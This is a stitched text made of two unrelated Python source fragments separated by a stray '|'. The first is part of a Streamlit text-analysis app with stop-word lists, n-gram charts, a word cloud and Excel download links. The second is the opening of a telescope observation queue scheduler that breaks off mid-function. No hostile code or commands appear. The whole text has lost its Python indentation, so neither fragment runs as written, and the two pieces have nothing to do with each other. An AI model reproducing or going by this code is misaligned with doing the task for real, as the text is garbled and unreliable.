"vorne","vorüber","vorueber","w","wachen","waehrend","waehrenddessen","waere","während","währenddem","währenddessen","wann","war","wär","wäre","waren","wären","warst","wart","warum","was","weder","weg","wegen","weil","weiß","weit","weiter","weitere","weiterem","weiteren","weiterer","weiteres","weiterhin","weitestgehend","weitestgehende","weitestgehendem","weitestgehenden","weitestgehender","weitestgehendes","weitgehend","weitgehende","weitgehendem","weitgehenden","weitgehender","weitgehendes","welche","welchem","welchen","welcher","welches","wem","wen","wenig","wenige","weniger","weniges","wenigstens","wenn","wenngleich","wer","werde","werden","werdet","weshalb","wessen","weswegen","wichtig","wie","wieder","wiederum","wieso","wieviel","wieviele","wievieler","wiewohl","will","willst","wir","wird","wirklich","wirklichem","wirklicher","wirkliches","wirst","wissen","wo","wobei","wodurch","wofuer","wofür","wogegen","woher","wohin","wohingegen","wohl","wohlgemerkt","wohlweislich","wolle","wollen","wollt","wollte","wollten","wolltest","wolltet","womit","womoeglich","womoegliche","womoeglichem","womoeglichen","womoeglicher","womoegliches","womöglich","womögliche","womöglichem","womöglichen","womöglicher","womögliches","woran","woraufhin","woraus","worden","worin","wuerde","wuerden","wuerdest","wuerdet","wurde","würde","wurden","würden","wurdest","würdest","wurdet","würdet","www","x","y","z","z.b","z.B.","zahlreich","zahlreichem","zahlreicher","zB","zb.","zehn","zehnte","zehnten","zehnter","zehntes","zeit","zeitweise","zeitweisem","zeitweisen","zeitweiser","ziehen","zieht","ziemlich","ziemliche","ziemlichem","ziemlichen","ziemlicher","ziemliches","zirka","zog","zogen","zu","zudem","zuerst","zufolge","zugleich","zuletzt","zum","zumal","zumeist","zumindest","zunächst","zunaechst","zur","zurück","zurueck","zusammen","zusehends","zuviel","zuviele","zuvieler","zuweilen","zwanzig","zwar","zwei","zweifelsfrei","zweifelsfreie","zweifelsfreiem","zweifelsfreien","zweifelsfreier","zweifelsfreies","zweite","zweiten","zweiter","zweites","zwischen","zwölf"]
elif stopword_selection=="Use a built-in list of stop words in English":
word_stopwords=['a','about','above','after','again','against','ain','all','am','an','and','any','are','aren',"aren't",'as','at','be','because','been','before','being','below','between','both','but','by','can','couldn',"couldn't",'d','did','didn',"didn't",'do','does','doesn',"doesn't",'doing','don',"don't",'down','during','each','few','for','from','further','had','hadn',"hadn't",'has','hasn',"hasn't",'have','haven',"haven't",'having','he','her','here','hers','herself','him','himself','his','how','i','if','in','into','is','isn',"isn't",'it',"it's",'its','itself','just','ll','m','ma','me','mightn',"mightn't",'more','most','mustn',"mustn't",'my','myself','needn',"needn't",'no','nor','not','now','o','of','off','on','once','only','or','other','our','ours','ourselves','out','over','own','re','s','same','shan',"shan't",'she',"she's",'should',"should've",'shouldn',"shouldn't",'so','some','such','t','than','that',"that'll",'the','their','theirs','them','themselves','then','there','these','they','this','those','through','to','too','under','until','up','ve','very','was','wasn',"wasn't",'we','were','weren',"weren't",'what','when','where','which','while','who','whom','why','will','with','won',"won't",'wouldn',"wouldn't",'y','you',"you'd","you'll","you're","you've",'your','yours','yourself','yourselves']
elif stopword_selection=="Specify stop words":
word_stopwords=[]
user_stopwords=st.text_area('Please enter or copy stop words here', value='', height=200, key = session_state.id )
if len(user_stopwords)>0:
stopwords_cv = CountVectorizer()
stopwords_cv_fit=stopwords_cv.fit_transform([user_stopwords])
word_stopwords=stopwords_cv.get_feature_names()
st.write("")
a4,a5=st.beta_columns(2)
with a4:
# user specification of words to search
word_list=pd.DataFrame(columns=word_sorted.index)
#words_cleaned=word_list.drop(word_stopwords,axis=1)
words_cleaned=sorted(list(set(word_list)-set(word_stopwords)))
find_words=st.multiselect("Search sentences with following words",
words_cleaned, key = session_state.id)
with a5:
#user-specification of n-grams
user_ngram=st.number_input("Specify the number of words to be extracted (n-grams)", min_value=1, value=2, key = session_state.id)
if st.checkbox('Show a word count', value = False, key = session_state.id):
st.write(word_sorted)
st.write("")
number_remove=st.checkbox("Remove numbers from text", value=True, key = session_state.id)
a4,a5=st.beta_columns(2)
with a4:
#WordCloud color specification
st.write("")
draw_WordCloud=st.checkbox("Create a Word Cloud", value=True, key = session_state.id)
with a5:
if draw_WordCloud==True:
#color options for the WordCloud (user selection)
color_options= pd.DataFrame(np.array([[21, 120, 12, 240, 30]]),
columns=['orange', 'green', 'red','blue','brown'])
user_color_name=st.selectbox('Select the main color of your WordCloud',color_options.columns, key = session_state.id)
user_color=color_options[user_color_name]
st.write("")
st.write("")
run_text = st.button("Press to start text processing...")
if run_text:
st.write("")
st.write("")
st.info("Text processing progress")
text_bar = st.progress(0.0)
progress = 0
#---------------------------------------------------------------------------------
# Basic NLP metrics and visualisations
#---------------------------------------------------------------------------------
wfreq_output = st.beta_expander("Basic NLP metrics and visualisations ", expanded = False)
with wfreq_output:
# Word frequency
st.subheader('Word count')
#calculate word frequency - stop words exluded:
word_sorted=fc.cv_text(user_text, word_stopwords, 1,user_precision,number_remove)
st.write("")
st.write("Number of words: ", word_sorted["Word count"].sum())
st.write("Number of sentences", len(re.findall(r"([^.]*\.)" ,user_text)))
if len(word_stopwords)>0:
st.warning("All analyses are based on text with stop words removed!")
else:
st.warning("No stop words are removed from the text!")
st.write(word_sorted.style.format({"Rel. freq.": "{:.2f}"}))
a4,a5=st.beta_columns(2)
with a4:
# relative frequency for the top 10 words
txt_bar=word_sorted.head(min(len(word_sorted),10))
fig = go.Figure()
fig.add_trace(go.Bar(x=txt_bar["Rel. freq."], y=txt_bar.index, name='',marker_color = 'indianred',opacity=0.5,orientation='h'))
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title='relative fraction %', titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white",align="left"))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig, use_container_width=True)
st.info("Top " + str(min(len(word_sorted),10)) + " words relative frequency")
with a5:
fig = go.Figure(data=[go.Histogram(x=word_sorted["Word length"], histnorm='probability',marker_color ='steelblue',opacity=0.5)])
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title='word length', titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white",align="left"))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig, use_container_width=True)
st.info("Word length distribution")
#word similarity vs. word length & word frequency
word_similarity=[]
for word in txt_bar.index:
d=0
for sword in txt_bar.index:
seq = SequenceMatcher(None,word,sword)
d = d+(seq.ratio()*100)
word_similarity.append([d])
txt_bar["Similarity"]=(np.float_(word_similarity)/len(txt_bar.index)).round(user_precision)
a4,a5=st.beta_columns(2)
with a4:
# bubble chart
fig = go.Figure(data=[go.Scatter(
y=txt_bar.index, x=txt_bar["Rel. freq."], mode='markers',text=txt_bar["Similarity"],
marker_size=txt_bar["Similarity"],marker_color='indianred') ])
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title='relative frequency', titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white",align="left"))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig, use_container_width=True)
st.info("Bubble size eq. average word similarity across the top " + str(min(len(word_sorted),10)) +" words")
with a5:
df_to_plot=word_sorted
df_to_plot['word']=word_sorted.index
fig = px.scatter(data_frame=df_to_plot, x='Word length', y='Rel. freq.',hover_data=['word','Word length', 'Rel. freq.'], color_discrete_sequence=['steelblue'])
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title="word length", titlefont_size=14, tickfont_size=14,),)
fig.update_layout(yaxis=dict(title="word frequency", titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white", ))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig)
st.info("A comparision of frequencies of short and long words")
# bigram distribution
cv2_output=fc.cv_text(user_text, word_stopwords, 2,user_precision,number_remove)
# trigram distribution
cv3_output=fc.cv_text(user_text, word_stopwords, 3,user_precision,number_remove)
a4,a5=st.beta_columns(2)
with a4:
txt_bar=cv2_output.head(min(len(cv2_output),10))
fig = go.Figure()
fig.add_trace(go.Bar(x=txt_bar["Rel. freq."], y=txt_bar.index, name='',marker_color = 'indianred',opacity=0.5,orientation='h'))
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title='relative fraction %', titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white",align="left"))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig, use_container_width=True)
st.info("Top " + str(min(len(cv2_output),10)) + " bigrams relative frequency")
with a5:
txt_bar=cv3_output.head(10)
fig = go.Figure()
fig.add_trace(go.Bar(x=txt_bar["Rel. freq."], y=txt_bar.index, name='',marker_color = 'indianred',opacity=0.5,orientation='h'))
fig.update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',})
fig.update_layout(xaxis=dict(title='relative fraction %', titlefont_size=14, tickfont_size=14,),)
fig.update_layout(hoverlabel=dict(bgcolor="white",align="left"))
fig.update_layout(height=400,width=400)
st.plotly_chart(fig, use_container_width=True)
st.info("Top " + str(min(len(cv2_output),10)) + " trigrams relative frequency")
if draw_WordCloud==True:
#Draw WordCloud
wordcloud = WordCloud(background_color="white",
contour_color="white",max_words=100,stopwords=word_stopwords,
width=600,height=400,color_func=random_color_func).generate(user_text)
fig_text, ax = plt.subplots()
ax=plt.imshow(wordcloud, interpolation='bilinear')
plt.axis("off")
st.subheader('WordCloud')
st.pyplot(fig_text)
progress += 1
text_bar.progress(progress/3)
# Download link
st.write("")
output = BytesIO()
excel_file = pd.ExcelWriter(output, engine="xlsxwriter")
word_sorted.to_excel(excel_file, sheet_name="words",index=False)
if len(word_stopwords)>0:
pd.DataFrame(word_stopwords,columns=['stop words']).to_excel(excel_file, sheet_name="stop words",index=False)
if len(cv2_output)>0:
cv2_output.to_excel(excel_file, sheet_name="bigrams",index=True)
if len(cv3_output)>0:
cv3_output.to_excel(excel_file, sheet_name="trigrams",index=True)
excel_file.save()
excel_file = output.getvalue()
b64 = base64.b64encode(excel_file)
dl_file_name = "BasicTextAnalysis.xlsx"
st.markdown(
f"""
<a href="data:file/excel_file;base64,{b64.decode()}" id="button_dl" download="{dl_file_name}">Download basic NLP metrics</a>
""",
unsafe_allow_html=True)
st.write("")
#---------------------------------------------------------------------------------
# Sentences with specific words
#---------------------------------------------------------------------------------
if len(find_words)>0:
# extract all sentences with specific words:
sentences_list=[]
sentences = re.findall(r"([^.]*\.)" ,user_text)
for sentence in sentences:
if all(word in sentence for word in find_words):
if len(sentence)<1000: # threshold for to long sentences is 1000 characters
sentences_list.append(sentence)
if len(sentences_list)>0:
sentences_output = st.beta_expander("Sentences with specific words", expanded = False)
with sentences_output:
for sentence in sentences_list:
st.write(sentence)
#st.table(pd.DataFrame({'Sentences':sentences_list}))
# Download link
st.write("")
output = BytesIO()
excel_file = pd.ExcelWriter(output, engine="xlsxwriter")
pd.DataFrame({'Sentences':sentences_list}).to_excel(excel_file, sheet_name="Sentences",index=False)
excel_file.save()
excel_file = output.getvalue()
b64 = base64.b64encode(excel_file)
dl_file_name = "Sentences with specific words.xlsx"
st.markdown(
f"""
<a href="data:file/excel_file;base64,{b64.decode()}" id="button_dl" download="{dl_file_name}">Download sentences</a>
""",
unsafe_allow_html=True)
st.write("")
progress += 1
text_bar.progress(progress/3)
#---------------------------------------------------------------------------------
# User specific n-grams
#---------------------------------------------------------------------------------
#extract n-grams:
ngram_list=[]
text_cv = fc.cv_text(user_text, word_stopwords,user_ngram,user_precision,number_remove)
#CountVectorizer(analyzer='word', stop_words=set(word_stopwords), ngram_range=(user_ngram, user_ngram))
#text_cv_fit=text_cv.fit_transform([user_text])
#listToString='. '.join(text_cv.get_feature_names())
listToString='. '.join(text_cv.index)
sentences = re.findall(r"([^.]*\.)" ,listToString)
for sentence in sentences:
if all(word in sentence for word in find_words):
sentence=re.sub('[.]', '', sentence)
ngram_list.append(sentence)
if len(ngram_list)>0:
ngram_output = st.beta_expander("n-grams", expanded = False)
with ngram_output:
st.write("")
st.subheader("n-grams")
st.write("")
for sentence in ngram_list:
st.write(sentence)
# Download link
st.write("")
output = BytesIO()
excel_file = pd.ExcelWriter(output, engine="xlsxwriter")
pd.DataFrame({'n-gram':ngram_list}).to_excel(excel_file, sheet_name=str(user_ngram) +"-gram",index=False)
excel_file.save()
excel_file = output.getvalue()
b64 = base64.b64encode(excel_file)
dl_file_name = str(user_ngram)+"gram.xlsx"
st.markdown(
f"""
<a href="data:file/excel_file;base64,{b64.decode()}" id="button_dl" download="{dl_file_name}">Download n-grams</a>
""",
unsafe_allow_html=True)
st.write("")
progress += 1
text_bar.progress(progress/3)
# Success message
#st.success('Text processing completed')
|
"""Queue classes."""
import os
from collections import defaultdict
from datetime import datetime
import logging
import numpy as np
import pandas as pd
import astropy.coordinates as coord
import astropy.units as u
from astropy.time import Time, TimeDelta
import astroplan
from .Fields import Fields
from .optimize import tsp_optimize, night_optimize
from .cadence import enough_gap_since_last_obs
from .constants import P48_loc, PROGRAM_IDS, FILTER_IDS, TIME_BLOCK_SIZE
from .constants import EXPOSURE_TIME, READOUT_TIME, FILTER_CHANGE_TIME, slew_time
from .constants import PROGRAM_BLOCK_SEQUENCE, LEN_BLOCK_SEQUENCE, MAX_AIRMASS
from .constants import BASE_DIR
from .utils import approx_hours_of_darkness
from .utils import skycoord_to_altaz, seeing_at_pointing
from .utils import altitude_to_airmass, airmass_to_altitude, RA_to_HA, HA_to_RA
from .utils import scalar_len, nightly_blocks, block_index, block_index_to_time
from .utils import block_use_fraction, maximum_altitude, compute_limiting_mag
class QueueEmptyError(Exception):
"""Error class for when the nightly queue has no more fields"""
pass
class QueueManager(object):
def __init__(self, queue_name, queue_configuration, rp=None, fields=None):
self.logger = logging.getLogger(__name__)
# queue name (useful in Scheduler object when swapping queues)
self.queue_name = queue_name
# list of ObservingPrograms
self.observing_programs = queue_configuration.build_observing_programs()
# defaults to handle time-windowed queues
self.is_TOO = False
self.validity_window = None
# Hack for greedy queues
self.requests_in_window = True
if 'validity_window_mjd' in queue_configuration.config:
window = queue_configuration.config['validity_window_mjd']
if window is not None:
assert(len(window) == 2)
self.set_validity_window_mjd(window[0], window[1])
else:
self.validity_window = None
else:
self.validity_window = None
# flag to check if assign_nightly_requests has been called tonight
self.queue_night = None
# block on which the queue parameters were calculated
self.queue_slot = None
# number allowed requests by subprogram tonight
# (dict of (program_id, subprogram_name))
self.requests_allowed = {}
# the queue itself
self.queue = pd.DataFrame()
# should we only consider fields from one program in a given
# observing block?
# CURRENTLY NOT IMPLEMENTED.
self.block_programs = False
if rp is None:
# initialize an empty RequestPool
self.rp = RequestPool()
else:
self.rp = rp
if fields is None:
self.fields = Fields()
else:
self.fields = fields
self.missed_obs_queue = None
def is_valid(self, time):
if self.validity_window is None:
return True
window_start = self.validity_window[0]
window_stop = self.validity_window[1]
return window_start <= time <= window_stop
def validity_window_mjd(self):
if self.validity_window is None:
return None
return [self.validity_window[0].mjd, self.validity_window[1].mjd]
def set_validity_window_mjd(self, window_start, window_stop):
"""Set the time at which this queue can run.
Parameters
----------
window_start : `float`
Modified Julian Date start time
window_stop : `float`
Modified Julian Date end time
"""
if window_start >= window_stop:
raise ValueError("validity window start time must be less than end time")
# rough sanity checks
if window_start <= Time('2017-01-01').mjd:
raise ValueError(f"MJD likely out of range: {window_start}")
if window_stop >= Time('2030-01-01').mjd:
raise ValueError(f"MJD likely out of range: {window_stop}")
self.validity_window = [Time(window_start,format='mjd'),
Time(window_stop,format='mjd')]
def compute_block_use(self):
"""Returns a dictionary with the fraction of blocks used by the queue,
assuming observing starts at the beginning of the validity window"""
if self.validity_window is None:
raise ValueError('All blocks are valid')
start_block = block_index(self.validity_window[0])
obs_start_time = Time(self.validity_window[0],format='mjd')
# greedy queues have no len until they have assignments made, so
# just use the validity window
if len(self.queue) == 0:
stop_block = block_index(self.validity_window[1])
obs_end_time = self.validity_window[1]
else:
# with no weather, we start at the start of the window
if 'n_repeats' in self.queue.columns:
n_obs = np.sum(self.queue.n_repeats)
exp_time = np.sum(self.queue.exposure_time * self.queue.n_repeats)
else:
n_obs = len(self.queue)
exp_time = np.sum(self.queue.exposure_time)
obs_time = (exp_time * u.second) + n_obs * READOUT_TIME
obs_end_time = self.validity_window[0] + obs_time
stop_block = block_index(obs_end_time)
# below breaks if the window is longer than the observations
#stop_block = block_index(self.validity_window[1])
assert obs_end_time > obs_start_time
# compute fraction of the blocks used by the queue
block_use = defaultdict(float)
for block in np.arange(start_block, stop_block+1):
block_use[block] = block_use_fraction(block, obs_start_time,
obs_end_time)
return block_use
def add_observing_program(self, observing_program):
self.observing_programs.append(observing_program)
def assign_nightly_requests(self, current_state, obs_log,
time_limit = 30 * u.second, block_use = defaultdict(float),
timed_obs_count = defaultdict(int)):
# clear previous request pool
if self.queue_name != 'missed_obs':
self.rp.clear_all_request_sets()
# set number of allowed requests by program.
self.determine_allowed_requests(current_state['current_time'],
obs_log, timed_obs_count = timed_obs_count)
# can be used by field_selection_functions downstream
program_fields = {}
for program in self.observing_programs:
key = (program.program_id, program.subprogram_name)
program_fields[key] = \
{'field_ids': program.field_ids,
'field_selection_function': program.field_selection_function,
'requests_allowed': self.requests_allowed[key]}
for program in self.observing_programs:
request_sets = program.assign_nightly_requests(
current_state['current_time'], self.fields,
obs_log, program_fields, block_programs=self.block_programs)
for rs in request_sets:
self.rp.add_request_sets(rs['program_id'],
rs['subprogram_name'], rs['program_pi'],
rs['field_ids'], rs['filter_ids'],
rs['intranight_gap'],
rs['exposure_time'],
rs['total_requests_tonight'])
# assert(len(self.rp.pool) > 0)
# any specific tasks needed)
self._assign_nightly_requests(current_state,
time_limit = time_limit, block_use = block_use)
# mark that we've set up the pool for tonight
self.queue_night = np.floor(current_state['current_time'].mjd)
def adjust_program_exposures_tonight(self, obs_log, mjd_start, mjd_stop):
"""Use past history to adjust the number of exposures per program tonight.
Counts exposures from the start of the month and equalizes any excess
over NIGHTS_TO_REDISTRIBUTE or the number of nights to the end of
the month, whichever is less."""
obs_count_by_program = obs_log.count_equivalent_obs_by_program(
mjd_range = [mjd_start, mjd_stop])
# drop engineering/commissioning
obs_count_by_program = obs_count_by_program[
obs_count_by_program['program_id'] != 0]
obs_count_by_program.set_index('program_id', inplace=True)
# if there are no observations, add zeros
for program_id in PROGRAM_IDS:
if program_id != 0:
if program_id not in obs_count_by_program.index:
obs_count_by_program.loc[program_id] = 0
total_obs = np.sum(obs_count_by_program['n_obs'])
# infer the program fractions from the subprograms
target_program_fractions = {propid:0 for propid in PROGRAM_IDS
if propid != 0}
for op in self.observing_programs:
target_program_fractions[op.program_id] = \
op.program_observing_time_fraction
target_program_fractions = pd.Series(target_program_fractions)
target_program_fractions.index.name = 'program_id'
target_program_fractions.name = 'target_fraction'
target_program_nobs = target_program_fractions * total_obs
target_program_nobs.name = 'target_program_nobs'
# note that this gives 0 in case of no observations, as desired
# have to do the subtraction backwords because of Series/DataFrame
# API nonsense
delta_program_nobs = \
-1*obs_count_by_program.subtract(target_program_nobs,
axis=0)
NIGHTS_TO_REDISTRIBUTE = 5
time = Time(mjd_stop,format='mjd')
dtnow = time.to_datetime()
if dtnow.month != 12:
next_month_start_mjd = Time(datetime(dtnow.year,dtnow.month+1,1),
scale='utc').mjd
else:
next_month_start_mjd = Time(datetime(dtnow.year+1,1,1),
scale='utc').mjd
nights_left_this_month = np.round(next_month_start_mjd - time.mjd)
if nights_left_this_month > NIGHTS_TO_REDISTRIBUTE:
divisor = NIGHTS_TO_REDISTRIBUTE
else:
divisor = nights_left_this_month
if divisor == 0:
divisor = 1
delta_program_nobs /= divisor
delta_program_nobs = np.round(delta_program_nobs).astype(int)
return delta_program_nobs
def adjust_subprogram_exposures_tonight(self, obs_log, mjd_start, mjd_stop):
"""Use past history to adjust the number of exposures per subprogram tonight.
Counts exposures from the start of the month and equalizes any excess
over NIGHTS_TO_REDISTRIBUTE or the number of nights to the end of
the month, whichever is less."""
obs_count_by_subprogram_all = obs_log.count_equivalent_obs_by_subprogram(
mjd_range = [mjd_start, mjd_stop])
# drop engineering/commissioning
obs_count_by_subprogram_all = obs_count_by_subprogram_all[
obs_count_by_subprogram_all['program_id'] != 0]
obs_count_by_subprogram_all.set_index(['program_id','subprogram_name'],
inplace=True)
# only count the subprograms that are currently active. This is
# going to cause problems when the programs change--but we are going to
# only use the subprogram balance for i-band
obs_count_by_current_subprogram_dict = {}
# if there are no observations, add zeros
for op in self.observing_programs:
idx = (op.program_id, op.subprogram_name)
if idx not in obs_count_by_subprogram_all.index:
obs_count_by_current_subprogram_dict[idx] = 0
else:
obs_count_by_current_subprogram_dict[idx] = obs_count_by_subprogram_all.loc[idx,'n_obs']
obs_count_by_subprogram = pd.Series(obs_count_by_current_subprogram_dict)
obs_count_by_subprogram.name = 'n_obs'
obs_count_by_subprogram.index.set_names(
['program_id','subprogram_name'], inplace=True)
total_obs = obs_count_by_subprogram.sum()
# record the subprogram fractions
target_subprogram_fractions = defaultdict(float)
for op in self.observing_programs:
target_subprogram_fractions[(op.program_id, op.subprogram_name)] = \
op.program_observing_time_fraction * op.subprogram_fraction
target_subprogram_fractions = pd.Series(target_subprogram_fractions)
# target_program_fractions.index.name = 'program_id'
target_subprogram_fractions.name = 'target_fraction'
target_subprogram_nobs = target_subprogram_fractions * total_obs
target_subprogram_nobs.name = 'target_subprogram_nobs'
target_subprogram_nobs.index.set_names(
['program_id','subprogram_name'], inplace=True)
# note that this gives 0 in case of no observations, as desired
# have to do the subtraction backwords because of Series/DataFrame
# API nonsense
delta_subprogram_nobs = \
-1*obs_count_by_subprogram.subtract(target_subprogram_nobs,
axis=0).fillna(0)
NIGHTS_TO_REDISTRIBUTE = 5
time = Time(mjd_stop,format='mjd')
dtnow = time.to_datetime()
if dtnow.month != 12:
next_month_start_mjd = Time(datetime(dtnow.year,dtnow.month+1,1),
scale='utc').mjd
else:
next_month_start_mjd = Time(datetime(dtnow.year+1,1,1),
scale='utc').mjd
nights_left_this_month = np.round(next_month_start_mjd - time.mjd)
if nights_left_this_month > NIGHTS_TO_REDISTRIBUTE:
divisor = NIGHTS_TO_REDISTRIBUTE
else:
divisor = nights_left_this_month
if divisor == 0:
divisor = 1
delta_subprogram_nobs /= divisor
delta_subprogram_nobs = np.round(delta_subprogram_nobs).astype(int)
return delta_subprogram_nobs
def determine_allowed_requests(self, time, obs_log,
timed_obs_count = defaultdict(int)):
"""Use count of past observations and expected observing time fractions
to determine number of allowed requests tonight.
Exclude observations already planned in timed queues."""
self.requests_allowed = {}
# rather than using equivalent obs, might be easier to work in
# exposure time directly?
# enforce program balance on a monthly basis
dtnow = time.to_datetime()
month_start_mjd = Time(datetime(dtnow.year,dtnow.month,1),
scale='utc').mjd
delta_program_exposures_tonight = self.adjust_program_exposures_tonight(
obs_log, month_start_mjd, time.mjd)
# use this for i-band only
delta_subprogram_exposures_tonight = self.adjust_subprogram_exposures_tonight(
obs_log, month_start_mjd, time.mjd)
self.logger.info(f'Change in allowed exposures: {delta_program_exposures_tonight}')
self.logger.info(f'Needed change in allowed exposures by subprogram: {delta_subprogram_exposures_tonight}')
self.logger.debug(f"Sum of change in allowed exposures by subprogram: {delta_subprogram_exposures_tonight.reset_index().groupby('program_id').agg(np.sum)}")
self.logger.info(f'Number of timed observations: {timed_obs_count}')
dark_time = approx_hours_of_darkness(time)
# calculate subprogram fractions excluding list queues and TOOs
scheduled_subprogram_sum = defaultdict(float)
for op in self.observing_programs:
# list queues and TOOs should set field_ids = [], but not None
# OPs scheduled using field_selection_function will have
# field_ids = None
if op.field_ids is not None:
if len(op.field_ids) == 0:
continue
scheduled_subprogram_sum[op.program_id] += \
op.subprogram_fraction
for op in self.observing_programs:
program_time_tonight = (
dark_time * op.program_observing_time_fraction +
(delta_program_exposures_tonight.loc[op.program_id,'n_obs']
- timed_obs_count[op.program_id]) * (EXPOSURE_TIME+READOUT_TIME))
subprogram_time_tonight = (
program_time_tonight * op.subprogram_fraction /
scheduled_subprogram_sum[op.program_id])
n_requests = (subprogram_time_tonight.to(u.min) /
op.time_per_exposure().to(u.min)).value[0]
n_requests = np.round(n_requests).astype(np.int)
# i_band program balance needs individual tuning due to
# longer cadence and filter blocking
if op.subprogram_name == 'i_band':
delta_i_nexp = delta_subprogram_exposures_tonight.loc[(2,'i_band')]
if delta_i_nexp > 0:
self.logger.info(f'Adding {delta_i_nexp} additional i-band exposures')
n_requests += delta_i_nexp
else:
self.logger.info(f'Implied change in i-band exposures is negative, skipping supplementation: {delta_i_nexp}')
self.requests_allowed[(op.program_id,
op.subprogram_name)] = n_requests
for key, n_requests in self.requests_allowed.items():
if n_requests < 0:
self.requests_allowed[key] = 0
self.logger.info(self.requests_allowed)
def next_obs(self, current_state, obs_log):
"""Given current state, return the parameters for the next request"""
# don't store the telescope state locally!
# check that assign_nightly_requests has been called tonight.
if self.queue_type != 'list':
if np.floor(current_state['current_time'].mjd) != self.queue_night:
self.assign_nightly_requests(current_state, obs_log)
# define functions that actually do the work in subclasses
next_obs = self._next_obs(current_state, obs_log)
# check if we have a disallowed observation, and reject it:
if next_obs['target_limiting_mag'] < 0:
self.logger.warning(f'Target is unobservable! Removing from queue {next_obs}')
self.remove_requests(next_obs['request_id'])
next_obs = self.next_obs(current_state, obs_log)
next_obs['queue_name'] = self.queue_name
return next_obs
def update_queue(self, current_state, obs_log, **kwargs):
"""Recalculate queue"""
# define functions that actually do the work in subclasses
return self._update_queue(current_state, obs_log)
def remove_requests(self, request_id):
"""Remove a request from both the queue and the request set pool"""
# define functions that actually do the work in subclasses
return self._remove_requests(request_id)
def return_queue(self):
"""Return queue values, ordered in the expected sequence if possible"""
queue = self._return_queue()
cols = ['field_id','filter_id','exposure_time','program_id',
'subprogram_name','ra','dec','ordered']
if self.queue_type == 'gurobi':
cols.append('slot_start_time')
if self.queue_type == 'list':
cols.append('mode_num')
cols.append('ewr_num_images')
return queue.loc[:,cols]
class GurobiQueueManager(QueueManager):
def __init__(self, queue_name, queue_configuration, **kwargs):
super().__init__(queue_name, queue_configuration, **kwargs)
self.block_obs_number = 0
self.queue_type = 'gurobi'
def _assign_nightly_requests(self, current_state,
time_limit = 30.*u.second, block_use = defaultdict(float)):
self._assign_slots(current_state, time_limit = time_limit,
block_use = block_use)
def _next_obs(self, current_state, obs_log):
"""Select the highest value request."""
# do the slot assignment at the beginning of the night
# (or if the queue is empty, which should be unusual)
# if we've entered a new block, solve the TSP to sequence the requests
if (block_index(current_state['current_time'])[0] != self.queue_slot):
try:
self._move_requests_to_missed_obs(self.queue_slot)
except Exception as e:
self.logger.exception(e)
self.logger.error('Failed moving requests to missed obs!')
self._sequence_requests_in_block(current_state)
if (len(self.queue_order) == 0):
raise QueueEmptyError("Ran out of observations this block.")
idx = self.queue_order[0]
row = self.queue.loc[idx]
if self.queue_slot in self.filter_by_slot:
filter_id = int(self.filter_by_slot[self.queue_slot])
else:
raise QueueEmptyError("No requests in this slot!")
next_obs = {'target_field_id': int(row['field_id']),
'target_ra': row['ra'],
'target_dec': row['dec'],
'target_filter_id': filter_id,
'target_program_id': int(row['program_id']),
'target_subprogram_name': row['subprogram_name'],
'target_program_pi': row['program_pi'],
'target_exposure_time': row['exposure_time'] * u.second,
'target_sky_brightness':
self.block_sky_brightness.loc[idx,self.queue_slot][filter_id],
'target_limiting_mag':
self.block_lim_mags.loc[idx,self.queue_slot][filter_id],
'target_metric_value':
self.block_slot_metric.loc[idx,self.queue_slot][filter_id],
'target_total_requests_tonight': int(row['total_requests_tonight']),
'target_mode_num': 0,
'target_num_images': 1,
'request_id': idx}
# 'target_sky_brightness': self.queue.ix[idx].sky_brightness,
# 'target_limiting_mag': self.queue.ix[idx].limiting_mag,
# 'target_metric_value': self.queue.ix[idx].value,
# 'target_request_number_tonight':
return next_obs
def _slot_metric(self, limiting_mag, dec):
"""Calculate metric for assigning fields to slots.
penalizes volume for both extinction (airmass) and fwhm penalty
due to atmospheric refraction, plus sky brightness from
moon phase and distance
== 1 for 21st mag.
normalize metrics by maximum value at transit
so low-declination fields are not penalized
"""
#see 200430 notes
metric = (10.**(0.6 * (limiting_mag - 21)) /
(1-1e-4*(maximum_altitude(dec) - 90)**2.))
# lock out -99 limiting mags even more aggressively
return metric.where(limiting_mag > 0, -0.99)
def _assign_slots(self, current_state, time_limit = 30*u.second,
block_use = defaultdict(float)):
"""Assign requests in the Pool to slots"""
# check that the pool has fields in it
if len(self.rp.pool) == 0:
raise QueueEmptyError("No fields in pool")
# join with fields so we have the information we need
# make a copy so rp.pool and self.queue are not linked
df = self.rp.pool.join(self.fields.fields, on='field_id').copy()
# calculate limiting mag by block. uses the block midpoint time
blocks, times = nightly_blocks(current_state['current_time'],
time_block_size=TIME_BLOCK_SIZE)
# remove the excluded blocks, if any. Could do this in optimize.py
# but it makes the optimization problem unneccesarily bigger
# don't demand 100% of the block is used: tiny fractions lead to
# infeasible models
exclude_blocks = [b for (b,v) in block_use.items() if v > 0.95]
self.logger.debug(f'Excluding completely filled blocks {exclude_blocks}')
if len(exclude_blocks):
cut_blocks = np.setdiff1d(blocks, exclude_blocks)
cut_times = block_index_to_time(cut_blocks,
current_state['current_time'], where='mid')
blocks, times = cut_blocks, cut_times
lim_mags = {}
sky_brightnesses = {}
decs = {}
for bi, ti in zip(blocks, times):
if 'altitude' in df.columns:
df.drop('altitude', axis=1, inplace=True)
if 'azimuth' in df.columns:
df.drop('azimuth', axis=1, inplace=True)
# use pre-computed blocks
df_alt = self.fields.block_alt[bi]
df_alt.name = 'altitude'
df = df.join(df_alt, on='field_id')
